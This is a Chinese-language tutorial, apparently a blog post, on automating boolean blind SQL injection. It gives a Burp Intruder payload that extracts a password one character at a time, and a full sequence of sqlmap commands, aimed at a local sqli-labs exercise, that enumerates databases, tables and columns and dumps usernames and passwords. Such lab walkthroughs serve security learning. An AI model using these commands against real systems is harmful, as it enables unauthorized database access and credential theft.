【工具跑SQL盲注】

目录

一、(工具)burp跑盲注

1.1、方法一:爆破

1.2、方法二:注入语句爆破

二、(工具)sqlmap跑布尔盲注

2.1、命令:

2.2、利用过程:

第一步:检测是否存在注入

 第二步:爆数据库名

 第三步:爆数据库表名

 第四步:爆字段名

 第五步:爆数据

 三、推荐


一、(工具)burp跑盲注

1.1、方法一:爆破

抓包之后,将请求发送到"Intruder"模块

设置2个有效载荷

 

1.2、方法二:注入语句爆破

注入构造语句,进行迭代操作

(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)



二、(工具)sqlmap跑布尔盲注

2.1、命令:

-u 指定注入点

--dbs 跑库 名

--tables 跑表 名

--columns 跑字段 名

--dump 枚举数据

跑出对应的后,依次加上-D 指定库 -T 指定表 -C 指定字段

2.2、利用过程:

第一步:检测是否存在注入

基础操作

python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch

--batch是使用默认设置

其实环境都扫出来了 

就可以再加上--dbms mysql了


 第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url --dbs --batch

---------

#获取当前数据库

sqlmap.py -u url --current-dbs --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch

 


 第三步:爆数据库表名

命令

python sqlmap.py -u url -D DB --tables --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

 


 第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL --columns --batch


基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch


 第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch


基础操作:

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

 



 三、推荐

【SQL注入-无回显】布尔盲注:原理、函数、利用过程

【SQL注入-有回显】DNS请求注入:原理、平台、使用过程、配置

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值